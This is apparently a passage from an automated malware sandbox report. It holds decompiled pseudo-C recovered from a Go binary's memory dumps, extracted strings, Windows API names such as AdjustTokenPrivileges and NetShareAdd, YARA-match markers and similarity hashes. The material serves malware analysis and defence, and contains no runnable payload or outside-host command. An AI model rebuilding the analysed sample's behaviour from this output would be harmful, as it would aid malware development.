                                                                                                                            													E01332A40(_t297, _t300, _t301, _t302, _t303, _v56, _t459, _t471, _t516);
                                                                                                                            													E01332C40(_t297, _t301, _t302, _t303, 0x13867ff, _t380, _t471, _t516);
                                                                                                                            													_t400 = _v136;
                                                                                                                            													_t427 = _v136 + _v112;
                                                                                                                            													E01332A40(_t297, _t300, _t301, _t302, _t303, _t427, _t459, _t471, _t516);
                                                                                                                            													E01332C40(_t297, _t301, _t302, _t303, 0x1386afc, _t380, _t471, _t516);
                                                                                                                            													E01332940(_t301, _t302, _t303, _v216, _v136, _t471, _t516);
                                                                                                                            													E01332C40(_t297, _t301, _t302, _t303, 0x13867b3, _t380, _t471, _t516);
                                                                                                                            													E01332940(_t301, _t302, _t303, _v224, _v136, _t471, _t516);
                                                                                                                            													E01332C40(_t297, _t301, _t302, _t303, 0x13867b3, _t380, _t471, _t516);
                                                                                                                            													E01332940(_t301, _t302, _t303, _v232, _t400, _t471, _t516);
                                                                                                                            													E01332C40(_t297, _t301, _t302, _t303, 0x13867b1, _t380, _t471, _t516);
                                                                                                                            													L013323C0(_t427, _t471, _t516);
                                                                                                                            													_t331 = _v136 + 1;
                                                                                                                            													__eflags = _t331;
                                                                                                                            												}
                                                                                                                            												L62:
                                                                                                                            												E01330BA0(0x1388850, _t380, _t471);
                                                                                                                            												goto L63;
                                                                                                                            											}
                                                                                                                            										}
                                                                                                                            									} else {
                                                                                                                            										L25:
                                                                                                                            										if(_t312 >= 0) {
                                                                                                                            											L63:
                                                                                                                            											E013588C0();
                                                                                                                            											goto L64;
                                                                                                                            										} else {
                                                                                                                            											L26:
                                                                                                                            											_t439 =  *((intOrPtr*)(_t482 + _t503 * 8));
                                                                                                                            											if(_t439 != 0) {
                                                                                                                            												L28:
                                                                                                                            												_v128 = _t503;
                                                                                                                            												_v80 = _t439;
                                                                                                                            												_v104 = _t510;
                                                                                                                            												_v184 = _t489;
                                                                                                                            												__eflags = _t517 - 0x40;
                                                                                                                            												asm("dec eax");
                                                                                                                            												__eflags =  *((intOrPtr*)(_t457 + _t502 * 8)) - 0x40;
                                                                                                                            												asm("dec ebp");
                                                                                                                            												_t511 = _t503 + _t478;
                                                                                                                            												_v120 = _t511;
                                                                                                                            												r8d = 1;
                                                                                                                            												_t510 = _t511 << _t297 & _t482;
                                                                                                                            												_t482 = 0 + _t510;
                                                                                                                            												_t361 = _t482;
                                                                                                                            												_t189 =  *_v24();
                                                                                                                            												_t462 = _v80;
                                                                                                                            												_t439 = _t462;
                                                                                                                            												_t302 = _t302 & 0x001fffff;
                                                                                                                            												_t478 = 0;
                                                                                                                            												__eflags = _t439 & 0x00000000;
                                                                                                                            												r9d = 0x200000;
                                                                                                                            												_t463 =  !=  ? _t482 : _t462;
                                                                                                                            												_t493 = _v184;
                                                                                                                            												_t502 = _t493 + _t463;
                                                                                                                            												_t380 = _a16;
                                                                                                                            												__eflags = _t380 - _t502;
                                                                                                                            												if(__eflags <= 0) {
                                                                                                                            													L42:
                                                                                                                            													__eflags = _v176 - 0x40;
                                                                                                                            													asm("dec eax");
                                                                                                                            													__eflags = _t493;
                                                                                                                            													_t510 =  ==  ? _v128 << _t297 &  &_v24 : _v104;
                                                                                                                            													_t317 = _a8;
                                                                                                                            													_t427 = _v64;
                                                                                                                            													_t457 = 0x14667c0;
                                                                                                                            													_t478 = _v112;
                                                                                                                            													_t482 = _v32;
                                                                                                                            													_t489 = _t502;
                                                                                                                            													_t502 = _v56;
                                                                                                                            													goto L43;
                                                                                                                            												} else {
                                                                                                                            													L29:
                                                                                                                            													asm("dec eax");
                                                                                                                            													if(__eflags >= 0) {
                                                                                                                            														_t502 = _t439;
                                                                                                                            														_t301 = _t301 & 0x001fffff;
                                                                                                                            														__eflags = _t301;
                                                                                                                            														_t361 = _t439 >> 0x15;
                                                                                                                            														_t439 = _t502;
                                                                                                                            													} else {
                                                                                                                            														_t189 = 0x200000;
                                                                                                                            													}
                                                                                                                            													__eflags = _t380 - _t361;
                                                                                                                            													if(_t380 <= _t361) {
                                                                                                                            														L2:
                                                                                                                            														_t488 = _v56;
                                                                                                                            														_t395 = _t488 + 1;
                                                                                                                            														_t315 = _a8;
                                                                                                                            														_t456 = _v120;
                                                                                                                            														_t426 = _t456;
                                                                                                                            														continue;
                                                                                                                            													} else {
                                                                                                                            														L33:
                                                                                                                            														__eflags = _t493;
                                                                                                                            														if(__eflags != 0) {
                                                                                                                            															L35:
                                                                                                                            															_t410 = _v176;
                                                                                                                            															__eflags = _t410 - 0x40;
                                                                                                                            															asm("dec ebp");
                                                                                                                            															r12d = 1;
                                                                                                                            															_t509 = _t503 << _t297 & _t502;
                                                                                                                            															__eflags = _t463 - _t509;
                                                                                                                            															if(__eflags >= 0) {
                                                                                                                            																L41:
                                                                                                                            																_t439 = _t493 + _t509;
                                                                                                                            																_t317 = _a8;
                                                                                                                            																_t427 = _v64;
                                                                                                                            																_t457 = 0x14667c0;
                                                                                                                            																_t478 = _v112;
                                                                                                                            																_t482 = _v32;
                                                                                                                            																_t502 = _v56;
                                                                                                                            																_t503 = _v128;
                                                                                                                            																_t517 = _v176;
                                                                                                                            																_t510 = _v104;
                                                                                                                            																goto L23;
                                                                                                                            															} else {
                                                                                                                            																L36:
                                                                                                                            																asm("dec eax");
                                                                                                                            																goto L37;
                                                                                                                            															}
                                                                                                                            														} else {
                                                                                                                            															L34:
                                                                                                                            															asm("dec eax");
                                                                                                                            															_t410 = _v176;
                                                                                                                            															L37:
                                                                                                                            															if(__eflags >= 0) {
                                                                                                                            																_t439 = _t439 >> 0x2a;
                                                                                                                            																_t301 = _t301 & 0x001fffff;
                                                                                                                            																__eflags = _t410 - 0x40;
                                                                                                                            															} else {
                                                                                                                            																__eflags = _t410 - 0x40;
                                                                                                                            																_t301 = 0x200000;
                                                                                                                            															}
                                                                                                                            															asm("dec ebp");
                                                                                                                            															_t467 = _v128;
                                                                                                                            															_t510 = (_t510 & _t467 + 0x00000001 << _t297) - _t439;
                                                                                                                            															_t317 = _a8;
                                                                                                                            															_t427 = _v64;
                                                                                                                            															_t478 = _v112;
                                                                                                                            															_t482 = _v32;
                                                                                                                            															_t502 = _v56;
                                                                                                                            															_t503 = _t467;
                                                                                                                            															_t517 = _v176;
                                                                                                                            															_t457 = 0x14667c0;
                                                                                                                            															goto L23;
                                                                                                                            														}
                                                                                                                            													}
                                                                                                                            												}
                                                                                                                            											} else {
                                                                                                                            												L27:
                                                                                                                            												_t301 = 0;
                                                                                                                            												L23:
                                                                                                                            												_t503 = _t503 + 1;
                                                                                                                            												_t489 = _t439;
                                                                                                                            												goto L24;
                                                                                                                            											}
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						L67:
                                                                                                                            					}
                                                                                                                            					L66:
                                                                                                                            					_a8 = _t315;
                                                                                                                            					_a16 = _t380;
                                                                                                                            					E01356200(_t426, _t471);
                                                                                                                            				}
                                                                                                                            			}
                                                                                                                            0x0132593d
                                                                                                                            0x01325947
                                                                                                                            0x0132594a
                                                                                                                            0x01325649
                                                                                                                            0x01325649
                                                                                                                            0x01325649
                                                                                                                            0x0132564c
                                                                                                                            0x013258d6
                                                                                                                            0x013258dd
                                                                                                                            0x013258ee
                                                                                                                            0x01325652
                                                                                                                            0x01325652
                                                                                                                            0x01325652
                                                                                                                            0x01325657
                                                                                                                            0x0132565a
                                                                                                                            0x01325660
                                                                                                                            0x0132566a
                                                                                                                            0x0132566d
                                                                                                                            0x01325673
                                                                                                                            0x01325677
                                                                                                                            0x0132567c
                                                                                                                            0x0132568d
                                                                                                                            0x0132568d
                                                                                                                            0x01325694
                                                                                                                            0x01325699
                                                                                                                            0x0132569f
                                                                                                                            0x013256a2
                                                                                                                            0x0132567e
                                                                                                                            0x0132567e
                                                                                                                            0x0132567e
                                                                                                                            0x013256a9
                                                                                                                            0x013256ae
                                                                                                                            0x013256b3
                                                                                                                            0x013256bd
                                                                                                                            0x013256c1
                                                                                                                            0x013256c1
                                                                                                                            0x013256b5
                                                                                                                            0x013256b5
                                                                                                                            0x013256b5
                                                                                                                            0x013256c8
                                                                                                                            0x013256cd
                                                                                                                            0x013256e0
                                                                                                                            0x013256ed
                                                                                                                            0x013256f4
                                                                                                                            0x01325705
                                                                                                                            0x0132570f
                                                                                                                            0x01325720
                                                                                                                            0x0132572a
                                                                                                                            0x01325740
                                                                                                                            0x0132574a
                                                                                                                            0x01325760
                                                                                                                            0x0132576a
                                                                                                                            0x0132576f
                                                                                                                            0x01325774
                                                                                                                            0x01325779
                                                                                                                            0x0132578a
                                                                                                                            0x01325797
                                                                                                                            0x013257a8
                                                                                                                            0x013257b5
                                                                                                                            0x013257c6
                                                                                                                            0x013257d3
                                                                                                                            0x013257d8
                                                                                                                            0x013257e0
                                                                                                                            0x013257f4
                                                                                                                            0x01325800
                                                                                                                            0x01325811
                                                                                                                            0x01325820
                                                                                                                            0x01325831
                                                                                                                            0x01325840
                                                                                                                            0x01325845
                                                                                                                            0x0132584a
                                                                                                                            0x0132584f
                                                                                                                            0x01325862
                                                                                                                            0x01325871
                                                                                                                            0x01325875
                                                                                                                            0x01325880
                                                                                                                            0x01325891
                                                                                                                            0x013258a0
                                                                                                                            0x013258b1
                                                                                                                            0x013258b6
                                                                                                                            0x013258c0
                                                                                                                            0x013258c5
                                                                                                                            0x013258ca
                                                                                                                            0x01325a35
                                                                                                                            0x01325a35
                                                                                                                            0x01325a40
                                                                                                                            0x01325a43
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01325a49
                                                                                                                            0x01325a49
                                                                                                                            0x01325a51
                                                                                                                            0x01325a55
                                                                                                                            0x01325a68
                                                                                                                            0x01325a6b
                                                                                                                            0x01325a71
                                                                                                                            0x01325a75
                                                                                                                            0x01325a7a
                                                                                                                            0x01325a8b
                                                                                                                            0x01325a8b
                                                                                                                            0x01325a91
                                                                                                                            0x01325a96
                                                                                                                            0x01325a9c
                                                                                                                            0x01325a7c
                                                                                                                            0x01325a7c
                                                                                                                            0x01325a7c
                                                                                                                            0x01325a9f
                                                                                                                            0x01325aa7
                                                                                                                            0x01325aac
                                                                                                                            0x01325ab1
                                                                                                                            0x01325abd
                                                                                                                            0x01325ac1
                                                                                                                            0x01325ab3
                                                                                                                            0x01325ab3
                                                                                                                            0x01325ab3
                                                                                                                            0x01325961
                                                                                                                            0x01325966
                                                                                                                            0x01325977
                                                                                                                            0x01325984
                                                                                                                            0x01325995
                                                                                                                            0x013259a2
                                                                                                                            0x013259aa
                                                                                                                            0x013259b1
                                                                                                                            0x013259c2
                                                                                                                            0x013259cc
                                                                                                                            0x013259e0
                                                                                                                            0x013259ea
                                                                                                                            0x01325a00
                                                                                                                            0x01325a0a
                                                                                                                            0x01325a20
                                                                                                                            0x01325a25
                                                                                                                            0x01325a32
                                                                                                                            0x01325a32
                                                                                                                            0x01325a32
                                                                                                                            0x01325acc
                                                                                                                            0x01325ad8
                                                                                                                            0x00000000
                                                                                                                            0x01325ad8
                                                                                                                            0x0132564c
                                                                                                                            0x013253e0
                                                                                                                            0x013253e0
                                                                                                                            0x013253e0
                                                                                                                            0x01325add
                                                                                                                            0x01325ae3
                                                                                                                            0x00000000
                                                                                                                            0x013253e6
                                                                                                                            0x013253e6
                                                                                                                            0x013253e6
                                                                                                                            0x013253ed
                                                                                                                            0x013253f3
                                                                                                                            0x013253f3
                                                                                                                            0x013253fb
                                                                                                                            0x01325403
                                                                                                                            0x0132540b
                                                                                                                            0x01325410
                                                                                                                            0x01325414
                                                                                                                            0x0132541b
                                                                                                                            0x0132541f
                                                                                                                            0x0132542a
                                                                                                                            0x0132542e
                                                                                                                            0x01325439
                                                                                                                            0x0132544f
                                                                                                                            0x0132545c
                                                                                                                            0x01325468
                                                                                                                            0x0132546b
                                                                                                                            0x0132546e
                                                                                                                            0x01325476
                                                                                                                            0x01325479
                                                                                                                            0x0132547f
                                                                                                                            0x01325489
                                                                                                                            0x0132548c
                                                                                                                            0x01325492
                                                                                                                            0x01325496
                                                                                                                            0x0132549b
                                                                                                                            0x0132549f
                                                                                                                            0x013254a7
                                                                                                                            0x013254aa
                                                                                                                            0x013255dd
                                                                                                                            0x013255e2
                                                                                                                            0x013255e6
                                                                                                                            0x013255f7
                                                                                                                            0x01325602
                                                                                                                            0x01325606
                                                                                                                            0x01325616
                                                                                                                            0x0132561e
                                                                                                                            0x01325625
                                                                                                                            0x0132562d
                                                                                                                            0x01325635
                                                                                                                            0x01325638
                                                                                                                            0x00000000
                                                                                                                            0x013254b0
                                                                                                                            0x013254b0
                                                                                                                            0x013254b0
                                                                                                                            0x013254b5
                                                                                                                            0x013254be
                                                                                                                            0x013254c5
                                                                                                                            0x013254c5
                                                                                                                            0x013254cb
                                                                                                                            0x013254ce
                                                                                                                            0x013254b7
                                                                                                                            0x013254b7
                                                                                                                            0x013254b7
                                                                                                                            0x013254d1
                                                                                                                            0x013254d4
                                                                                                                            0x01324ff9
                                                                                                                            0x01324ff9
                                                                                                                            0x01325001
                                                                                                                            0x01325005

                                                                                                                            Strings
                                                                                                                            • runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaning bytes failed with errno= to unused region of spanAUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironmentStringsWGODEBUG: can n, xrefs: 01325805
                                                                                                                            • ] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabkindpipeprofrootsbrksse3tcp4trueudp4uint ... MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDogr, xrefs: 01325714
                                                                                                                            • runtime: levelShift[level] = runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longtimeBegin/EndPeriod not foun, xrefs: 01325885
                                                                                                                            • , ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJST, xrefs: 013252EF, 0132530F, 0132572F, 0132574F
                                                                                                                            • ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinfmagc g, xrefs: 013252B6, 013256F9
                                                                                                                            • runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size bec, xrefs: 0132577E
                                                                                                                            • , levelBits[level] = AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Standard TimeEastern Standard TimeGetProfilesDirectoryWInscriptional_PahlaviLookupPrivilegeValueWMagadan Standard TimeMorocco , xrefs: 013258A5
                                                                                                                            • , npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai_LueOld_PersianOld_SogdianOpenProcessPau_Cin_HauRegClos, xrefs: 0132579C
                                                                                                                            • bad summary databad symbol tablecastogscanstatusgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapnewmHandoff.lockno route to hostnon-Go functionobje, xrefs: 0132537C, 01325ACC
                                                                                                                            • , j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaUNKNOWNWKOWAODWSARecvWSASendtypes value=c, xrefs: 013257BA
                                                                                                                            • ] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=%, xrefs: 013252D4
                                                                                                                            • runtime: npages = runtime: range = {runtime: textAddr streams pipe errorsystem page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=Altai Standard TimeBahia Standard TimeCa, xrefs: 0132534F
                                                                                                                            • ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ, xrefs: 0132532F
                                                                                                                            • , i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11WanchoYezidichan<-efencelistenobjectpopcntrdtscpselectso, xrefs: 01325825
                                                                                                                            • runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory ,, xrefs: 0132529B, 013256D2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • API String ID: 0-2227700264
                                                                                                                            • Opcode ID: 14e40b0fa269391e9d220e59527eef905deeec2b1502a8525b7866a8c2197ac9
                                                                                                                            • Instruction ID: ca88d0d332ac100233b01df9445f5af6ded81a1ea5867ceb65cc15fe69777604
                                                                                                                            • Opcode Fuzzy Hash: 14e40b0fa269391e9d220e59527eef905deeec2b1502a8525b7866a8c2197ac9
                                                                                                                            • Instruction Fuzzy Hash: 2D32DC72314BD581EB24EB19E8403DBA325F799BD8F444122CE9E17B68DF38C689CB44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            • ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_DigitInheritedKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanPGDGBKWR, xrefs: 013166B2
                                                                                                                            • +,-./0:<=?CLMPSZ[\, xrefs: 013164B6, 01316625
                                                                                                                            • (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriti, xrefs: 013167BC
                                                                                                                            • MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException , xrefs: 0131673C
                                                                                                                            • ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandina, xrefs: 013164E5
                                                                                                                            • @ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHST, xrefs: 01316365
                                                                                                                            • gc done but gcphase != _GCoffgfput: bad status (not Gdead)invalid function symbol tableinvalid length of trace eventio: read/write on closed pipemachine is not on the networkno XENIX semaphores availablenotesleep - waitm out of syncnumerical result out of rang, xrefs: 0131684F
                                                                                                                            • MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_ControlGetAddrI, xrefs: 0131675B
                                                                                                                            • gcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabic, xrefs: 01315CC9, 01315CD9
                                                                                                                            • MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohs, xrefs: 0131671A
                                                                                                                            • failed to set sweep barriergcstopm: not waiting for gcgrowslice: cap out of rangeinternal lockOSThread errorinvalid profile bucket typekey was rejected by servicemakechan: size out of rangemakeslice: cap out of rangemakeslice: len out of rangemspan.sweep: bad , xrefs: 01316833
                                                                                                                            • ., xrefs: 013162CD
                                                                                                                            • MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep wait, xrefs: 0131677A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-1706010489
                                                                                                                            • Opcode ID: 78a17fd5057414e0ea5205b764af314908f956125eed84916aaf99f513a8482d
                                                                                                                            • Instruction ID: 1e9d1f1be274db88757c5fe11135c7f71d799c4c97b52ffa28f6ffc0d5d02815
                                                                                                                            • Opcode Fuzzy Hash: 78a17fd5057414e0ea5205b764af314908f956125eed84916aaf99f513a8482d
                                                                                                                            • Instruction Fuzzy Hash: 2752AF72309B8585EB54EB69E8803DAB765F799B98F449122CE8D17B79CF3CC085C740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-4281024703
                                                                                                                            • Opcode ID: 801b16fa52d17eec68a0687cd73a9322ebe1bc4493f64cd69913fc1b349e4682
                                                                                                                            • Instruction ID: bfe4f0a7ffe697cd7c83169bc7b40ae327ec3f158b9f4b1f808b0cdb35bc62d8
                                                                                                                            • Opcode Fuzzy Hash: 801b16fa52d17eec68a0687cd73a9322ebe1bc4493f64cd69913fc1b349e4682
                                                                                                                            • Instruction Fuzzy Hash: 6BE1AA72314B8482DB259B5AF4503DAB7A8F789B98F844226EFAD57B98DF3CC545C300
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3442832105-0
                                                                                                                            • Opcode ID: 07ab6262ff92bfa92d5391595e9564aeef5387165c55aa69f7944c162cd259d4
                                                                                                                            • Instruction ID: 0eabacc582728c484ea917836ec35ca06a4b11ee8f3088262f893a89ccfd8ed2
                                                                                                                            • Opcode Fuzzy Hash: 07ab6262ff92bfa92d5391595e9564aeef5387165c55aa69f7944c162cd259d4
                                                                                                                            • Instruction Fuzzy Hash: 1852F52111CD888BEB5AAB2CDC067E1F3E0FF69316F145218F985C7962EB34E5838795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 32%
                                                                                                                            			E0000025B25BF8A747D0(void* __eflags, long long __rbx, void* __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __r8, void* __r9, void* __r11) {
                                                                                                                            				void* __rbp;
                                                                                                                            				void* _t135;
                                                                                                                            				void* _t137;
                                                                                                                            				signed int _t138;
                                                                                                                            				void* _t139;
                                                                                                                            				signed int _t151;
                                                                                                                            				void* _t156;
                                                                                                                            				void* _t160;
                                                                                                                            				void* _t162;
                                                                                                                            				void* _t189;
                                                                                                                            				void* _t229;
                                                                                                                            				signed int _t232;
                                                                                                                            				signed int _t233;
                                                                                                                            				void* _t234;
                                                                                                                            				void* _t237;
                                                                                                                            				void* _t238;
                                                                                                                            				void* _t239;
                                                                                                                            				void* _t240;
                                                                                                                            				void* _t242;
                                                                                                                            				void* _t243;
                                                                                                                            				char _t247;
                                                                                                                            				void* _t250;
                                                                                                                            				void* _t251;
                                                                                                                            				void* _t252;
                                                                                                                            				void* _t256;
                                                                                                                            				signed int _t258;
                                                                                                                            				signed int _t265;
                                                                                                                            				void* _t277;
                                                                                                                            				void* _t301;
                                                                                                                            				signed int* _t395;
                                                                                                                            				void* _t401;
                                                                                                                            				void* _t402;
                                                                                                                            				signed int _t404;
                                                                                                                            				void* _t405;
                                                                                                                            				void* _t434;
                                                                                                                            				void* _t448;
                                                                                                                            				void* _t450;
                                                                                                                            				void* _t452;
                                                                                                                            				signed long long _t455;
                                                                                                                            				signed long long _t456;
                                                                                                                            				void* _t457;
                                                                                                                            				void* _t459;
                                                                                                                            				signed int _t460;
                                                                                                                            
                                                                                                                            				_t448 = __r11;
                                                                                                                            				_t434 = __r9;
                                                                                                                            				_t397 = __rsi;
                                                                                                                            				_t238 = __eflags;
                                                                                                                            				_t258 = _t404;
                                                                                                                            				 *((long long*)(_t258 + 8)) = __rbx;
                                                                                                                            				 *((long long*)(_t258 + 0x10)) = __rsi;
                                                                                                                            				 *((long long*)(_t258 + 0x20)) = __rdi;
                                                                                                                            				 *((long long*)(_t258 + 0x18)) = __r8;
                                                                                                                            				_t402 = _t258 - 0x378;
                                                                                                                            				_t405 = _t404 - 0x450;
                                                                                                                            				 *(_t405 + 0x30) =  *(_t405 + 0x30) & 0x00000000;
                                                                                                                            				_t301 = __rcx;
                                                                                                                            				_t395 = __rdx;
                                                                                                                            				r8d = 0x3ff;
                                                                                                                            				 *((char*)(_t405 + 0x50)) = 0;
                                                                                                                            				E0000025B25BF8A793C0(_t189, 0, _t229, _t237, _t405 + 0x51, __rdx, __r8);
                                                                                                                            				r12d = 0;
                                                                                                                            				_t10 = _t397 + 0x36; // 0x36
                                                                                                                            				_t190 = _t10;
                                                                                                                            				_t135 = E0000025B25BF8A77A30(_t10, _t238, _t258, __rdx);
                                                                                                                            				r8d = 0x400;
                                                                                                                            				_t460 = _t258;
                                                                                                                            				E0000025B25BF8A73230(_t135, _t405 + 0x38, _t301);
                                                                                                                            				_t12 = _t397 + 8; // 0x8
                                                                                                                            				_t188 = _t12;
                                                                                                                            				_t456 = _t455 | 0xffffffff;
                                                                                                                            				_t137 = E0000025B25BF8A73240(_t405 + 0x38);
                                                                                                                            				_t239 = _t137 - _t12;
                                                                                                                            				if (_t239 > 0) goto 0xf8a74be2;
                                                                                                                            				if (_t239 == 0) goto 0xf8a74bc1;
                                                                                                                            				_t240 = _t137;
                                                                                                                            				if (_t240 == 0) goto 0xf8a74f8d;
                                                                                                                            				if (_t240 == 0) goto 0xf8a74b6e;
                                                                                                                            				if (_t240 == 0) goto 0xf8a74ae3;
                                                                                                                            				if (_t240 == 0) goto 0xf8a74aa6;
                                                                                                                            				if (_t240 == 0) goto 0xf8a74a8e;
                                                                                                                            				if (_t240 == 0) goto 0xf8a749af;
                                                                                                                            				if (_t240 == 0) goto 0xf8a748f0;
                                                                                                                            				if (_t240 != 0) goto 0xf8a74849;
                                                                                                                            				_t138 = E0000025B25BF8A73240(_t405 + 0x38);
